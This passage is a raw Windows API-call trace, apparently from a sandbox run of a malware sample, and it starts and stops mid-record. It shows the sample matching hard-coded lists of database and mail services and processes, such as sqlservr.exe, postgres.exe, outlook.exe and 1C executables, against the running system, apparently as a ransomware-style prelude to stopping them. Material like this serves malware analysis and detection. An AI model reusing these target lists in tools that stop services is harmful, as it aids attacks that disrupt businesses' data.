(lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0047.337] lstrlenW (lpString="MMCSS") returned 5 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0047.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0047.337] lstrlenW (lpString="MpsSvc") returned 6 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0047.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0047.337] lstrlenW (lpString="Netman") returned 6 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0047.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0047.337] lstrlenW (lpString="netprofm") returned 8 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0047.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0047.337] lstrlenW (lpString="NlaSvc") returned 6 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0047.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0047.337] lstrlenW (lpString="nsi") returned 3 [0047.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0047.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0047.337] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0047.337] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0047.338] lstrlenW (lpString="PcaSvc") returned 6 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0047.338] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0047.338] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0047.338] lstrlenW (lpString="PlugPlay") returned 8 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0047.338] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0047.338] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0047.338] lstrlenW (lpString="Power") returned 5 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0047.338] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0047.338] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0047.338] lstrlenW (lpString="ProfSvc") returned 7 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0047.338] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0047.338] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0047.338] lstrlenW (lpString="RpcEptMapper") returned 12 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.338] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0047.338] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0047.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0047.338] lstrlenW (lpString="RpcSs") returned 5 [0047.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0047.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0047.339] lstrlenW (lpString="SamSs") returned 5 [0047.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0047.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0047.339] lstrlenW (lpString="Schedule") returned 8 [0047.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0047.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0047.339] lstrlenW (lpString="SENS") returned 4 [0047.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0047.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0047.339] lstrlenW (lpString="ShellHWDetection") returned 16 [0047.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0047.339] lstrlenW (lpString="Spooler") returned 7 [0047.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0047.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0047.339] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0047.339] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0047.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0047.339] lstrlenW (lpString="swprv") returned 5 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0047.340] lstrlenW (lpString="SysMain") returned 7 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0047.340] lstrlenW (lpString="Themes") returned 6 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0047.340] lstrlenW (lpString="TrkWks") returned 6 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0047.340] lstrlenW (lpString="UxSms") returned 5 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0047.340] lstrlenW (lpString="VSS") returned 3 [0047.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0047.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0047.340] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0047.340] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0047.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0047.341] lstrlenW (lpString="WdiServiceHost") returned 14 [0047.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.341] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0047.341] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0047.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0047.341] lstrlenW (lpString="WdiSystemHost") returned 13 [0047.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.341] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0047.341] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0047.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0047.341] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0047.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.341] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0047.341] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0047.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0047.341] lstrlenW (lpString="Winmgmt") returned 7 [0047.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0047.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0047.341] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0047.341] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0047.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0047.341] lstrlenW (lpString="WPDBusEnum") returned 10 [0047.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.341] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0047.341] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0047.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0047.341] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0047.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x194 [0047.344] Process32FirstW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.345] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.345] lstrlenW (lpString="System") returned 6 [0047.345] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0047.345] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0047.345] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.346] lstrlenW (lpString="smss.exe") returned 8 [0047.346] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0047.346] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0047.346] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.347] lstrlenW (lpString="csrss.exe") returned 9 [0047.347] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0047.347] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0047.347] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0047.347] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0047.347] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0047.347] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0047.347] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0047.348] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.349] lstrlenW (lpString="wininit.exe") returned 11 [0047.349] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0047.349] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0047.349] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0047.349] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.350] lstrlenW (lpString="csrss.exe") returned 9 [0047.350] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.350] lstrlenW (lpString="winlogon.exe") returned 12 [0047.350] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.351] lstrlenW (lpString="services.exe") returned 12 [0047.351] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.352] lstrlenW (lpString="lsass.exe") returned 9 [0047.352] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0047.353] lstrlenW (lpString="lsm.exe") returned 7 [0047.353] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.353] lstrlenW (lpString="svchost.exe") returned 11 [0047.353] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.354] lstrlenW (lpString="svchost.exe") returned 11 [0047.354] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.355] lstrlenW (lpString="svchost.exe") returned 11 [0047.355] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.356] lstrlenW (lpString="svchost.exe") returned 11 [0047.356] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.356] lstrlenW (lpString="svchost.exe") returned 11 [0047.356] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.357] lstrlenW (lpString="audiodg.exe") returned 11 [0047.357] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.358] lstrlenW (lpString="svchost.exe") returned 11 [0047.358] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.359] lstrlenW (lpString="svchost.exe") returned 11 [0047.359] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.359] lstrlenW (lpString="dwm.exe") returned 7 [0047.359] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.360] lstrlenW (lpString="explorer.exe") returned 12 [0047.360] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.361] lstrlenW (lpString="spoolsv.exe") returned 11 [0047.361] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.362] lstrlenW (lpString="taskhost.exe") returned 12 [0047.362] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.362] lstrlenW (lpString="svchost.exe") returned 11 [0047.362] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0047.364] lstrlenW (lpString="taskeng.exe") returned 11 [0047.364] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.364] lstrlenW (lpString="taskhost.exe") returned 12 [0047.365] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0047.365] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0047.365] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0047.366] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0047.366] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0047.367] lstrlenW (lpString="sa_shape.exe") returned 12 [0047.367] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0047.367] lstrlenW (lpString="confidence.exe") returned 14 [0047.368] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0047.368] lstrlenW 